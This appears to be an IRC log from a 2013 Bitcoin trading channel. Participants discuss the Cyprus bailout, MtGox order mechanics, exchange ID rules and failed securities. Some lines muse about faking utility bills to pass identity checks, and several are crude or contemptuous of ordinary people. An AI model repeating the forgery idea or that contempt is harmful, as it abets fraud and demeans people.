18 02:09:13 which reminds me of maitre rabelais Mar 18 02:11:00 [BTCTC] [PAJKA.BOND] 10 @ 0.105 = 1.05 BTC [+] Mar 18 02:15:22 mircae_popsescu, what's your background? Mar 18 02:15:29 white wall Mar 18 02:16:08 "Set in a wasteland enclosed by a large white wall, the last survivor from a brutal child internment camp reluctantly takes on one final bounty hunting job to protect the idyllic life he has rebuilt." Mar 18 02:16:54 Jeez, anyone heard the news from Cyprus? Mar 18 02:17:01 yea Mar 18 02:17:05 old news by now Mar 18 02:17:17 by innernet standards. Mar 18 02:17:35 cubeworld won't figure it out until monday. Mar 18 02:17:35 internet is 10x real time Mar 18 02:17:42 and bitcoin is 10x internet Mar 18 02:17:47 that shit is sooo last minute Mar 18 02:18:23 i wonder Mar 18 02:18:28 if incompetence Mar 18 02:18:37 wasn't sure, as it wasn't mentioned in channel. Mar 18 02:18:37 or indecipherable ulterior motives Mar 18 02:19:28 [MPEX] [S.MPOE] 20600 @ 0.00074371 = 15.3204 BTC [+] Mar 18 02:19:32 many things go unspoken here Mar 18 02:19:40 [MPEX] [S.MPOE] 5596 @ 0.00074387 = 4.1627 BTC [+] Mar 18 02:19:43 bgupta: theres been a few references to getting cyprus'd or 'doing a cyprus' Mar 18 02:19:51 You mean the news that they are going with a 13.5/3.5% split now? Mar 18 02:20:12 Seems that the majority of Cyriot bank deposits are held by wealthy russians who use Cyprus as a convenient place to park money in the eurozone. Mar 18 02:20:18 benkay : http://pastebin.com/4qxC6i8W Mar 18 02:20:30 bgupta it's pretty bad. holiday today tho/ Mar 18 02:20:35 no bailouts for oligarchs Mar 18 02:20:41 indefinite bank holiday Mar 18 02:20:47 they don't have the votes Mar 18 02:20:56 Bugpowder the thing is, the germans fucked up their eastern europe support by allying with the russians Mar 18 02:20:59 26+2 = 28, they need 29 Mar 18 02:21:04 (such as, the no visa thing, the romania schengen thingetc) Mar 18 02:21:11 and now just fucked their future with russia on this move. Mar 18 02:21:19 i've not seen more inept foreign policy since the bush days. Mar 18 02:21:24 Ah, I am not up to date on Romania EU unity politics Mar 18 02:21:38 I thought that was the netherlands or something Mar 18 02:21:39 *popcorn* Mar 18 02:21:43 well you can imagine how pissy the ukrainians were when the eu decided russians don't need visas Mar 18 02:21:49 when russia doesn't even return the favour Mar 18 02:21:56 wha? Mar 18 02:21:58 yeah Mar 18 02:22:24 Come prop up our real estate market? Mar 18 02:22:35 haha nah, ima prop the serbian market if anything. Mar 18 02:22:52 gotta love that country, told the us + the eu to fuck off and has the bombshells to prove it. Mar 18 02:23:24 plus, you should see the sort of cunt walking on two feet over hilly belgrade. Mar 18 02:23:35 [MPEX] [S.MPOE] 8604 @ 0.00074387 = 6.4003 BTC [+] Mar 18 02:23:36 quite belle grade. Mar 18 02:23:37 [MPEX] [S.MPOE] 11000 @ 0.0007441 = 8.1851 BTC [+] Mar 18 02:23:39 [MPEX] [S.MPOE] 7296 @ 0.00075195 = 5.4862 BTC [+] Mar 18 02:24:31 How many days will this holiday go on... Time to buy Treasuries again Mar 18 02:24:41 Also, probably bitcoins Mar 18 02:24:47 Bugpowder when the queen invented a holiday at the request of nixon Mar 18 02:24:50 it went on for two weeks Mar 18 02:24:55 a month seems possible in this case. Mar 18 02:25:20 in any way cyprus banks are like utah glaciers. Mar 18 02:25:20 If they really want to fuck russian oligarchs, just let the Cyprus banks blow Mar 18 02:25:36 russia will invade. Mar 18 02:26:11 bailout UK and EU people who have funds there Mar 18 02:26:29 im telling you. if you imagine "russian oligarchs" are sepparate from the russian govt... you're nuts. Mar 18 02:26:40 this is first line infiltration on their part, just like the chinese do in africa. Mar 18 02:26:52 they will totally land on the island. Mar 18 02:27:05 zerohedge is having a field day with this shit. Mar 18 02:27:06 http://www.zerohedge.com/news/2013-03-17/russia-sending-permanent-warship-fleet-mediterranean-russian-naval-base-cyprus-comin Mar 18 02:27:16 duh Mar 18 02:33:23 i'm missing something Mar 18 02:33:25 check this one Mar 18 02:33:29 http://bitcoincharts.com/charts/mtgoxUSD#rg5zig5-minztgSza1gSMAzm1g60za2gSMAzm2g180zxzi1gVolzi2gAccDist Mar 18 02:33:37 big red volume bar implies sale, correct? Mar 18 02:33:43 how does big sale lead to large price movement up? Mar 18 02:35:08 Say you have a wall of 5,000 ask at 47.50 Mar 18 02:35:29 they finally get antsy, and pull the wall and sell all 5,000 as a market order Mar 18 02:35:38 price dips to 47.3 Mar 18 02:35:42 but the wall is gone Mar 18 02:36:11 all the bids and asks between 47.3 and 47.5 are wiped out Mar 18 02:36:35 so if the next person that makes a trade wants to buy, the price goes up quickly above 47.5 Mar 18 02:36:40 [BTCTC] [ASICMINER-PT] 2 @ 0.888725 = 1.7775 BTC [-] Mar 18 02:36:50 gotcha. Mar 18 02:36:57 thank you, bug powder. Mar 18 02:36:58 red bar just means price closed lower than opened really. Mar 18 02:37:20 so did anyone receive their primeasic ? Mar 18 02:37:24 on candlestick, right? true also for volume bar? Mar 18 02:37:35 benkay should be yes. Mar 18 02:37:52 that would only happen on a sale, though, correct? Mar 18 02:38:03 as in filling buy orders Mar 18 02:38:03 volume bar = candlestick bar for color Mar 18 02:38:12 not really any relation, no. Mar 18 02:38:54 if there is a lot of liquidity and high volumes of trading, its more likely to happen on a sale Mar 18 02:38:57 BUT Mar 18 02:39:33 the bid and ask could also drift lower since the previous sale, in tandem, and then the next trade would be red regardless Mar 18 02:39:44 of if its a bid or ask getting hit Mar 18 02:40:02 thanks. makes sense. Mar 18 02:40:32 different question, do any traders on MPEx get priority in clearing orders? Mar 18 02:40:33 That is more common on MPEX than on MTGOX due to the greater number of trades Mar 18 02:40:38 benkay no. Mar 18 02:40:47 benkay, those that use pympex Mar 18 02:40:58 have an easier time than those that cut and paste into the webpage Mar 18 02:41:07 orders are processed as received Mar 18 02:41:18 [BTCTC] [PAJKA.BOND] 32 @ 0.105 = 3.36 BTC [+] Mar 18 02:41:53 thanks. i've been reading macmillan and came across that artifact of bygone years. Mar 18 02:42:10 [BTCTC] [PAJKA.BOND] 50 @ 0.105 = 5.25 BTC [+] Mar 18 02:42:37 lol Mar 18 02:42:39 bygone years? Mar 18 02:42:45 well Mar 18 02:42:46 Goldman gets priorty Mar 18 02:42:48 you know what i mean. Mar 18 02:43:00 frontrunning is rampant Mar 18 02:43:44 in the us market, be it as a whisper to the trading desk, or as a router thats has lower latency to the trading engine Mar 18 02:44:11 Most of HFT is trying to frontrun Mar 18 02:44:19 [BTCTC] [PAJKA.BOND] 30 @ 0.105 = 3.15 BTC [+] Mar 18 02:44:22 [BTCTC] [PAJKA.BOND] 20 @ 0.10999 = 2.1998 BTC [+] Mar 18 02:45:10 kakobrekla http://bitbet.us/bet/284/primeasic-has-a-miner/ Mar 18 02:45:25 apparently that guy was wrong. Mar 18 02:45:47 wait that shit is real? Mar 18 02:46:08 what ? Mar 18 02:46:40 [BTCTC] [BTC-TRADING-PT] 2 @ 0.2656 = 0.5312 BTC [-] Mar 18 02:46:43 primeasic Mar 18 02:46:50 well seeing how the bet resolved as no... Mar 18 02:47:31 goes from about 16% gain to 3% at the end Mar 18 02:47:39 [BTCTC] [PAJKA.BOND] 5 @ 0.105 = 0.525 BTC [-] Mar 18 02:47:59 right? Mar 18 02:48:02 ya Mar 18 02:48:22 one can always argue that is not "fair enough" Mar 18 02:48:32 yes Mar 18 02:48:41 but hey what can you do. Mar 18 02:48:43 but as long as it's argued from both sides you know it's exactly fair Mar 18 02:48:50 :D Mar 18 02:49:38 http://bitbet.us/bet/38/network-difficulty-under-12-million/ Mar 18 02:49:42 this is getting some volume too Mar 18 02:49:54 basically, bitbet march is like jan + feb x5 or some shit Mar 18 02:51:58 yeah Mar 18 02:52:01 thank you bfl Mar 18 02:52:27 what a crackhead https://bitcointalk.org/index.php?topic=137459.msg1635957#msg1635957 Mar 18 02:52:42 [BTCTC] [PAJKA.BOND] 6 @ 0.105 = 0.63 BTC [-] Mar 18 02:53:02 lol Mar 18 02:53:03 "I'm thinking your 'NO' vote was probably a mistake," Mar 18 02:55:10 "Together let's avoid a mistakes such as yours" Mar 18 02:55:31 this is why universal literacy is a bad idea. Mar 18 02:55:54 it doesn't make anyone any better, it just gives idiots more ways to manifest. Mar 18 02:56:14 how many of the 1000 shares are actually backed by silver, and not vaguely silver related 'investment vehicles' run by the least competent fund manager that does not yet have a scammer tag? Mar 18 02:56:40 another round of those would be needed yeah Mar 18 02:56:54 dunno it would make any diff anyway Mar 18 02:57:05 new will come Mar 18 02:57:06 Bugpowder to quote some other muppet, Mar 18 02:57:11 if you were a smart investor you'd know. Mar 18 02:57:17 :D Mar 18 02:57:37 also, they're backed by his guitar Mar 18 02:57:40 which he sold Mar 18 02:57:57 hey i have a skateboard Mar 18 02:58:00 i can has bitvestments? Mar 18 02:58:04 yes Mar 18 02:58:05 sure/ Mar 18 02:58:05 wat about dog Mar 18 02:58:10 can back securities with dog? Mar 18 02:58:14 you can have a dog on a skateboard hedge fund Mar 18 02:58:32 good logo idea Mar 18 02:58:36 actually... from a strict nominalist perspective, "Dog on a Skateboard" ins't a bad name for a fund at all. Mar 18 02:58:52 just as long as the person coming up with the name doesn't run it Mar 18 02:59:00 if that person was someone else other than me i mean Mar 18 02:59:01 etc. Mar 18 02:59:24 i am sorely tempted Mar 18 02:59:34 but that would be a distraction from creating value Mar 18 02:59:54 ziggap is looking like it was a great investment Mar 18 02:59:58 not Mar 18 03:00:09 http://goxgame.sytes.net/demo/ Mar 18 03:00:12 can anyone see that ? Mar 18 03:00:22 !ticker btct ziggap Mar 18 03:00:24 I thought I told you not to touch me. Mar 18 03:00:33 sassy assy. Mar 18 03:00:42 what's it trade under ? Mar 18 03:00:47 bitfunder Mar 18 03:00:50 o i c Mar 18 03:01:17 well... that's how far that went, im too lazy to go look Mar 18 03:01:22 delusional over-leveraged psycho fiat biz Mar 18 03:01:30 lol Mar 18 03:01:32 mircea_popescu: no Mar 18 03:01:49 [MPEX] [S.MPOE] 2150 @ 0.00074077 = 1.5927 BTC [-] Mar 18 03:01:51 [MPEX] [S.MPOE] 9716 @ 0.0007371 = 7.1617 BTC [-] Mar 18 03:02:27 [MPEX] [S.MPOE] 5833 @ 0.00072579 = 4.2335 BTC [-] Mar 18 03:02:29 [MPEX] [S.MPOE] 10618 @ 0.00072578 = 7.7063 BTC [-] Mar 18 03:02:31 [MPEX] [S.MPOE] 4449 @ 0.00072021 = 3.2042 BTC [-] Mar 18 03:02:41 bitcoin community is like 5 nines of idiot followers Mar 18 03:02:56 and the e-whatever of people who aren't are like "fuck leading these idiots" Mar 18 03:03:07 "let's take their money" Mar 18 03:03:29 and some miserably small fraction left over is like "you guise lets build awesome post fiat systems o wait nobody cares" Mar 18 03:03:31 ya well... this is an artefact of the utter failure of english culture. Mar 18 03:03:40 when you tell every imbecile that they're good as they are and valuable for existing Mar 18 03:03:55 i thought that was a particular hallmark of american culture Mar 18 03:03:58 all you can possibly get is a pointless mass of people only usefull for making salami Mar 18 03:04:18 nah, the english speaking world is pretty much similarly stupid. Mar 18 03:04:42 what parts of the world don't suck in this way? Mar 18 03:04:53 be it the us or the commonwealth, this fundamental error of thinking that you are born human rather than become human. Mar 18 03:05:38 pretty much all its enemies. the arabs, for instance. the russians, for another instance. Mar 18 03:05:42 dogs are traditionaly very poor skateboarderes Mar 18 03:05:45 the chinese, whatever. Mar 18 03:05:51 i dunno much about azn Mar 18 03:06:08 http://www.youtube.com/watch?v=CQzUsTFqtW0 Mar 18 03:06:34 prolly better than usagi this one. Mar 18 03:07:01 youtube is such a piece of shit. that link above ? "must have flash". however http://www.youtube.com/embed/CQzUsTFqtW0 works Mar 18 03:07:21 whoa kickass dog :D Mar 18 03:08:17 they're relatively easy to motivate Mar 18 03:08:25 i considered training dogs as a hobby Mar 18 03:08:32 heh Mar 18 03:08:43 read the way i wrote it, i consider things as a hobby Mar 18 03:09:08 i had dogs and went hunting a while back Mar 18 03:09:12 kinda too lazy for it by now Mar 18 03:09:34 prolly a good thing to do when im old i guess Mar 18 03:10:34 tu.silver having a problem?,no fucking way.the world is ending on that news Mar 18 03:11:05 what's the problem? Mar 18 03:11:23 not really a problem, we were just poking fun at the usagi character Mar 18 03:11:36 ahh Mar 18 03:11:47 i thought something happened to tu.silver Mar 18 03:12:06 nah Mar 18 03:12:09 usagi fund losing value? nothing that earth shattering since glbse Mar 18 03:12:13 nothing has and conceivably nothing will. at all. Mar 18 03:12:14 ever. Mar 18 03:12:24 lulz kk Mar 18 03:12:26 !l glbse cpa Mar 18 03:12:27 Last trade for CPA on GLBSE was at 0.014 BTC [-] Mar 18 03:12:31 ha. Mar 18 03:12:39 kakobrekla any way to get a timestamp "? Mar 18 03:12:52 hm Mar 18 03:13:00 from my old logs on the other hdd Mar 18 03:13:03 which is offline Mar 18 03:13:05 :p Mar 18 03:13:16 30d volume 1 Mar 18 03:13:36 but mircea_popescu must be around date glbse closed Mar 18 03:13:42 yeah Mar 18 03:13:48 oct what, 5th ? Mar 18 03:13:59 dunno is it 2013 already? Mar 18 03:14:01 sounds right Mar 18 03:14:34 https://bitcointalk.org/index.php?topic=150392.msg1635784#msg1635784 Mar 18 03:14:38 the girl back on the horse. Mar 18 03:15:08 18-07-12-20:49 [GLBSE] [CPA] 1 @ 0.1013 BTC Mar 18 03:15:20 :o Mar 18 03:15:37 but that is wrong Mar 18 03:15:39 i mean Mar 18 03:15:41 10 times wrong Mar 18 03:15:43 wait wut ? Mar 18 03:15:54 so it went from .1 to .01 in three mionths ?! Mar 18 03:16:03 what is this, usagi ? Mar 18 03:16:06 ah yeah the date Mar 18 03:16:09 hm Mar 18 03:16:13 o wait. it WAS usagi Mar 18 03:16:22 bwahahaha o gawd have mercy Mar 18 03:16:32 ya ofc is usagi Mar 18 03:16:38 did you think i was OT? Mar 18 03:16:41 silly. Mar 18 03:16:49 kakobrekla yes lol. i recall him doing nyan-whatever Mar 18 03:17:04 yea Mar 18 03:17:19 dude people were giving Diablo-D3 a real hard time, but there's better examples of glbse-ness Mar 18 03:17:41 !l glbse dmc Mar 18 03:17:42 Last trade for DMC on GLBSE was at 0.0666 BTC [-] Mar 18 03:17:46 ahahah Mar 18 03:17:47 HAH Mar 18 03:17:53 beastly. Mar 18 03:17:57 thats awesome Mar 18 03:18:05 doomed you mean? Mar 18 03:18:13 doomewsome Mar 18 03:18:15 kakobrekla: not at all, price is heading back up Mar 18 03:18:26 yeah you can hardly go below 0 Mar 18 03:18:26 people are finally realizing I was right all along Mar 18 03:18:29 !ticker btct dmc Mar 18 03:18:32 Your actions are useless. Mar 18 03:18:35 ^ Mar 18 03:19:06 fuckin skynet right thar Mar 18 03:19:10 let me guess, dmc is listed on bf too ? Mar 18 03:19:25 yep Mar 18 03:20:21 and no goxgame times out for me Mar 18 03:20:23 im starting to emerge a seeing pattern here Mar 18 03:20:33 :o Mar 18 03:20:42 pigeons me too. it's some sort of i dunno what play daytrading puppet made Mar 18 03:21:29 any news on coinlab? Mar 18 03:21:35 did the beta ever start? Mar 18 03:21:43 I signed up immediately Mar 18 03:21:46 no response Mar 18 03:21:53 mircea_popescu: whats wrong with bf? Mar 18 03:21:58 my mtgox withdrawl is maxed for the month Mar 18 03:22:19 just waiting for the rest of the funds to disappear into a coinlab clusterfuck Mar 18 03:23:31 has gox sent any comms around this? Mar 18 03:23:42 what happened to gox? Mar 18 03:23:51 I haven't seen an email or notification on teh site Mar 18 03:24:30 gox sold their us order book to a new york company, diablo-d3 Mar 18 03:24:31 Diablo-D3: gox won't serve us/canada Mar 18 03:24:33 Diablo-D3 i don't get the tickering Mar 18 03:24:40 mircea_popescu: ahh Mar 18 03:24:49 Bugpowder sucks. why;d you go so deep into gox ? Mar 18 03:24:54 benkay: glad I pulled out of mtgox then Mar 18 03:24:56 you knew they're dubious. Mar 18 03:25:24 so they are dropping USD and CAD? Mar 18 03:25:25 What was stupid was that I got verified, but didn't choose 50k as my max limit Mar 18 03:25:27 i just donated my balance to them i can't satisfy their id requirements despite being well under limits Mar 18 03:25:41 because I thought I'd never need it Mar 18 03:25:42 pigeons what do you mean can't ? Mar 18 03:25:49 then bitcoins went to $50 Mar 18 03:25:52 mircea_popescu: they will hold your ENTIRE balance if you dont ID on request Mar 18 03:25:52 Bugpowder at least it wasn't 64k Mar 18 03:25:54 and never send it back Mar 18 03:25:59 i mean i dont have prood of residency Mar 18 03:25:59 here's a crazy question Mar 18 03:26:04 cause im homeless Mar 18 03:26:04 !ticker Mar 18 03:26:06 ;;ticker Mar 18 03:26:06 I thought I told you not to touch me. Mar 18 03:26:07 BTCUSD ticker | Best bid: 47.46030, Best ask: 47.68000, Bid-ask spread: 0.21970, Last trade: 47.46029, 24 hour volume: 16140.79342397, 24 hour low: 46.80000, 24 hour high: 47.74700, 24 hour vwap: 47.43876 Mar 18 03:26:12 uh Mar 18 03:26:12 i live in a van down by the river Mar 18 03:26:24 what the fuck is "proof of residency" Mar 18 03:26:33 Utility bill Mar 18 03:26:35 utility bills from a rescidnce Mar 18 03:26:38 is it possible to perform a 51% attack and change the number of bitcoins that will ever be in circulation? Mar 18 03:26:42 addressed to your ID address Mar 18 03:26:45 benkay no. Mar 18 03:26:52 how no? Mar 18 03:26:55 i have plenty of addresses but they all have utilities included in the payments Mar 18 03:27:03 pigeons ^ Mar 18 03:27:08 benkay: because bitcoins are only generated with gen tx Mar 18 03:27:10 that exactly. wtf already. Mar 18 03:27:20 and block depth sets the rewards for those Mar 18 03:27:20 hey! Mar 18 03:27:49 pigeons: so what about a bank statement Mar 18 03:28:11 nope you need that too, but you also need a utility bill, and not one i pay for the office, for a residence Mar 18 03:28:27 i seriously can't believe the sort of shit people in the united soviets have to put up with. Mar 18 03:28:28 so tell him everything is included in the rent and he must comply with US Federal law Mar 18 03:28:33 and your supposed to only need those when you hit certain limits, except when you don't Mar 18 03:28:49 mircea_popescu: well that isn't it, he's pulling out of the US because people are pressuring him to comply with the law Mar 18 03:28:49 fuck it i dont care i just havent used them since, about a year now Mar 18 03:28:53 Round 2 "There's really no reason to vote NO on any of my securities." Mar 18 03:29:01 Diablo-D3 i sold like 100 btc on bitcoin-central. Mar 18 03:29:05 i needed an id and a bank account. Mar 18 03:29:09 https://bitcointalk.org/index.php?topic=133168.40 Mar 18 03:29:16 mircea_popescu: thats all they're required to ask for Mar 18 03:29:27 i treid to get my funds out again recently when i heard about coinlab, but same issue Mar 18 03:29:32 mircea_popescu: unless there is a federal investigation and the bank is proxying for it, they cant ask you for anything else Mar 18 03:29:39 mircea_popescu: and thats per the PATRIOT act Mar 18 03:29:39 well, they do Mar 18 03:29:52 pigeons: yes, because mtgox is not a bank Mar 18 03:29:55 Diablo-D3 this is yurp based tho Mar 18 03:29:56 and does not have any lawyers Mar 18 03:30:01 that's the main reason the fake utility bills are sold on silk road Mar 18 03:30:08 mircea_popescu: doesnt matter. us customers, us currency, they must comply with the law Mar 18 03:30:13 pigeons i was thinking, how hard can it be to fake one Mar 18 03:30:16 mircea_popescu: this is why hes pulling out Mar 18 03:30:49 Diablo-D3 yes, this is exactly the point. us citizens are becoming the underserved inhabitants of a financial ghetto. Mar 18 03:31:02 yeah woulod seem a lot of work to call each utility company and verify you didnt just change the name and address or date from an old one Mar 18 03:31:07 it's a sad state of affairs Mar 18 03:31:14 mircea_popescu: yes, and this is why we invented bitcoin in the first place Mar 18 03:31:21 pigeons except utility corp is not allowed to answer. Mar 18 03:31:28 what everyone should do is just blacklist mtgox and label all mtgox employees with scammer tags on the forums Mar 18 03:31:58 Diablo-D3 well... the one positive step forward is if we could move off the mtgox-based usd price to a community fixing price. Mar 18 03:32:12 mircea_popescu: well, I dont get why the fuck we're even measuring in USD Mar 18 03:32:14 :) Mar 18 03:32:23 we should be measuring it in ounces of gold. Mar 18 03:32:24 cause the euro is about to implode Mar 18 03:32:36 and you gotta measure it in some sort of slave scrip Mar 18 03:32:42 no you dont Mar 18 03:32:47 I want it measured in ounces of gold. Mar 18 03:32:49 for as long as you intend to allow scripslaves to get on the wagon Mar 18 03:32:52 and nothing but. Mar 18 03:32:54 why? Mar 18 03:32:58 i imagine people will still want to trade usd for bitcoins after coinlab, but i doubt they will use coinlab long Mar 18 03:32:59 well the nothing butt part might be difficult. Mar 18 03:33:00 BitHub: because gold is real Mar 18 03:33:01 do you only have gold? Mar 18 03:33:01 usd isnt Mar 18 03:33:15 dude it's so complicated to pay in gold. Mar 18 03:33:22 i can hold gold in my hand, I can't hold usd in my hand, I get some fictional make believe piece of paper instead Mar 18 03:33:28 going to the store and buying stuff with cash is more real than buying it with gold Mar 18 03:33:43 the government can devalue your USD at any time Mar 18 03:33:46 interesting that same thing is being discussed for the fifth time in like a week. Mar 18 03:33:46 its fictional and worthless Mar 18 03:33:53 its not even good as toliet paper, I've tried Mar 18 03:33:59 oh you mean by like doing a forking? Mar 18 03:34:01 like that? Mar 18 03:34:14 ima go make myself a dessert. Mar 18 03:34:24 kakobrekla: what, really? Mar 18 03:34:32 the dev's, mtgox can devalue bitcoin at any time Mar 18 03:34:35 im gonna try that toliet paper trick Mar 18 03:34:46 the euro is not going to implode Mar 18 03:34:55 banks can asky for anythign they want Mar 18 03:34:56 well not the gold part cause that is stupid Mar 18 03:34:57 they're private Mar 18 03:35:00 but the other parts. Mar 18 03:35:04 i was reading that the price on mtgox was suppose to crash once but mtgox halted and it and ignored it trying to avoid a meltdown Mar 18 03:35:08 talk about manipulation Mar 18 03:35:16 citation needed Mar 18 03:35:23 give me few mins Mar 18 03:35:33 yeah, thats why I pulled my btc out Mar 18 03:35:39 I was going to sell more soon as we went past $50 Mar 18 03:35:40 but fuck it Mar 18 03:35:41 bithub: too bad there is 4-5 other exchangs to reference price Mar 18 03:35:50 ;;ticker Mar 18 03:35:51 BTCUSD ticker | Best bid: 47.45136, Best ask: 47.75000, Bid-ask spread: 0.29864, Last trade: 47.75000, 24 hour volume: 16460.01280008, 24 hour low: 46.80000, 24 hour high: 47.75000, 24 hour vwap: 47.44219 Mar 18 03:35:54 Let's not confuse "mtgox's trading engine blows" with "mtgox is propping up the price by slowing orders" Mar 18 03:35:57 nanotube owns gribble right? Mar 18 03:36:12 He is user #1 Mar 18 03:36:28 I think gribble needs to pull best bid and ask from all exchanges Mar 18 03:36:39 and the same with the rest of the numbers Mar 18 03:36:49 well it isnt apples to apples Mar 18 03:36:51 averages Mar 18 03:36:55 BitHub: no, best of Mar 18 03:36:57 goxusd is not the same as btce usd Mar 18 03:37:04 pigeons: yes, but it can be Mar 18 03:37:06 heheh Mar 18 03:37:08 no Mar 18 03:37:20 I can pull btc out of mtgox and then put it in btce and make the transaction Mar 18 03:37:21 MPOE has a different risk profile than S.DICE Mar 18 03:37:37 BTCe has a different risk profile than MTgox Mar 18 03:37:54 well,my asshole was going to implode once ,but my stomach stopped it.my asshole said thanks that was going to be bad for evveryone Mar 18 03:37:55 we need like a temple, and sacrifice a virgin every morning and ask the Satoshi Gods to name their price for the day Mar 18 03:37:56 Is a dollar at bitfloor = a dollar at mtgox? Mar 18 03:37:59 BTCe is in Russia. so yea it's different Mar 18 03:38:09 bitfloor is in NY Mar 18 03:38:10 BitHub: well, Im seriously considering starting a religion Mar 18 03:38:13 Mtgox is in Japan Mar 18 03:38:20 3 different profiles completely Mar 18 03:38:30 a bird in the hand is worth 2 in your bush Mar 18 03:38:33 vampireb: all I'm hearing is "trust no exchange" Mar 18 03:38:38 correct. Mar 18 03:38:46 i dont trust anyone Mar 18 03:38:49 i'm doing a bitcoin political party and religion under the same branch Mar 18 03:38:52 all sides covered Mar 18 03:39:01 BitHub: religion and politics should never mix Mar 18 03:39:15 they mix well when acting as a sheild or bucket Mar 18 03:39:37 it makes sense to mix the two together Mar 18 03:39:39 low trading volume for a few days already Mar 18 03:41:52 who wants to deposit into mtgox when on Mar 22nd you can deposit to coinlab.... Mar 18 03:41:56 or on the 31st Mar 18 03:42:02 or sometime in the vague future Mar 18 03:48:01 [HAVELOCK] [SDICE] 2 @ 0.54 = 1.08 BTC [-] Mar 18 03:48:21 [BTCTC] [ASICMINER-PT] 10 @ 0.8885 = 8.885 BTC [-] Mar 18 03:49:04 deposit into coinlab and face never ending problems Mar 18 03:49:19 once coinlab is done bending you over, hello irs Mar 18 03:50:00 Gox is the same Mar 18 03:50:11 IRS is gonna get their share Mar 18 03:50:23 btc is not for the us Mar 18 03:50:28 it's for the rest of the world Mar 18 03:50:29 ALthough I will forcefully argue that it should be considered a longterm capital gain Mar 18 03:50:36 poor silicon valley entrepreneurs don't get it Mar 18 03:50:40 rather than collectable. Mar 18 03:51:05 although ten years from now this country will be all "wtf bitcoins? i thought that was a scam…" Mar 18 03:51:09 no mpoebot? Mar 18 03:51:25 *popcorn* Mar 18 03:51:53 benkay imma gonna start charging for that, cause of all the cleaning up i have to do afterwards. Mar 18 03:52:07 hey dude Mar 18 03:52:13 i paid for my ticket Mar 18 03:52:25 serfs are supposed to be gratis Mar 18 03:52:55 :) Mar 18 03:53:13 usagi: hiya :) Mar 18 03:54:05 usagi, I think you are needed in Cyprus for this confiscation vote Mar 18 03:54:23 good news usagi, silver down Mar 18 03:55:15 Just tell the people "I'm thinking your 'NO' vote was probably a mistake" Mar 18 03:56:06 silver popped, is fading now Mar 18 03:56:15 aww sorry Mar 18 03:56:21 but yeah, cyprus is presumably bullish for silver Mar 18 03:58:05 ;l glbse bmf Mar 18 03:58:15 !l glbse bmf Mar 18 03:58:16 Last trade for BMF on GLBSE was at 0.45999999 BTC [+] Mar 18 03:59:35 anyone here know what urda is ? Mar 18 04:00:07 Urdă is a Romanian fresh white cheese made by reprocessing the whey drained from cheeses such as caş or telemea. Mar 18 04:00:11 citation needed << he prolly means the hack 1 cent per btc episode mid 2011 Mar 18 04:00:51 o Mar 18 04:02:01 kakobrekla it's not really made out of whey, but it is the queen of soft sweet cheeses Mar 18 04:04:32 Last trade for COGNITIVE on GLBSE was at 0.575 BTC [-] Mar 18 04:07:46 [MPEX] [S.MPOE] 11863 @ 0.00072006 = 8.5421 BTC [-] Mar 18 04:08:56 [BTCTC] [ASICMINER-PT] 3 @ 0.8884 = 2.6652 BTC [-] Mar 18 04:09:35 sooo... btc deposited at mpex public address over 100k. Mar 18 04:10:04 Congrats! Mar 18 04:10:35 I thought it already went over that before. Mar 18 04:10:59 Time Between Blocks 6.79 (minutes) Mar 18 04:11:00 Namworld possibly you're thinking total inbound Mar 18 04:11:20 mircea_popescu: You mean 100k TOTAL CURRENT DEPOSITS?!? Mar 18 04:11:46 Bugpowder no i mean, just 1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx excluding 1JPvucRfu3ZzEvfBUQTJwsxMrZjeTqD6zR etc Mar 18 04:12:15 oh ok Mar 18 04:12:25 cause if you control more than 100k BTC Mar 18 04:12:30 ;;bc,stats Mar 18 04:12:33 Current Blocks: 226473 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 1334 blocks | Next Difficulty In About: 6 days, 7 hours, 1 minute, and 7 seconds | Next Difficulty Estimate: 6149093.71363 | Estimated Percent Change: 26.84697 Mar 18 04:12:34 starting to get risky Mar 18 04:12:38 you could run Mar 18 04:12:41 i control way more than 100k lol Mar 18 04:12:56 and have, for a while. Mar 18 04:12:58 LIQUID? Mar 18 04:13:01 yes liquid. Mar 18 04:13:01 not S.MPOE Mar 18 04:13:02 Bugpowder: he prolly won't run so long as btc < s.mpoe value Mar 18 04:13:06 what, you thought im destitute ? Mar 18 04:13:13 no Mar 18 04:13:21 not opm's tho. my own. Mar 18 04:13:32 I thought you had ~ $5MM and 50-100k BTC Mar 18 04:13:57 just an educated guess Mar 18 04:13:57 mircea_popescu: do we have a bitcoin lawyer yet? Mar 18 04:14:06 Diablo-D3 depends on who's whe Mar 18 04:14:09 we* Mar 18 04:14:11 'MM' == 'Mega Millions!!!' Mar 18 04:14:12 the community Mar 18 04:14:18 that i dunno Mar 18 04:14:24 damn Mar 18 04:14:27 I think giga is providing one Mar 18 04:14:32 for the community Mar 18 04:14:33 Bugpowder: I dont mean for that Mar 18 04:14:41 someone whos good at business law and shit Mar 18 04:14:44 there was a guy on the forum a year bacl Mar 18 04:14:55 but in general lawyers are on private retainers. Mar 18 04:15:03 the community can't afford it. Mar 18 04:15:05 mircea_popescu: which is expensive. meh. Mar 18 04:15:38 A decent associate is around $300 / hr Mar 18 04:15:40 like, if I want to issue those corporate bonds, I'm going to need a lawyer Mar 18 04:15:46 like, totally. Mar 18 04:15:51 that's transactional shit dude Mar 18 04:15:59 prepare yourself for 50k downpayment. Mar 18 04:16:01 ;;calc 31/1.05 Mar 18 04:16:01 29.5238095238 Mar 18 04:16:09 mircea_popescu: yeah =/ Mar 18 04:16:12 thats more money thav I have Mar 18 04:16:19 you could get by with a lower level of lawyer then Mar 18 04:16:19 [MPEX] [S.MPOE] 4500 @ 0.00071767 = 3.2295 BTC [-] Mar 18 04:16:28 someone who is making $60k / year Mar 18 04:16:34 ;;calc 31/1.014 Mar 18 04:16:35 30.5719921105 Mar 18 04:16:54 Bugpowder the problem is that in a field like "i wanna issue btc bonds" the opinion of a lawyer that makes 60k a month Mar 18 04:17:03 is no different from the oppinion of the bus driver Mar 18 04:17:09 mircea_popescu: the point if they're btc or not doesn't matter Mar 18 04:17:22 http://lawfirmsuccess.wordpress.com/2011/05/26/so-called-second-tier-lawyers-relish-new-options/ Mar 18 04:17:38 Diablo-D3 here's a tip : if you live in a smallish town see who your town used to advise on their bonds Mar 18 04:17:41 (which is public info) Mar 18 04:17:49 and go by their offices dressed nicely and being polite and ask Mar 18 04:17:53 You can get people that know how to do paperwork for you for cheap Mar 18 04:17:55 mircea_popescu: how would I find that out? Mar 18 04:18:09 Diablo-D3 it's published somewhere, but you'll have to go digging Mar 18 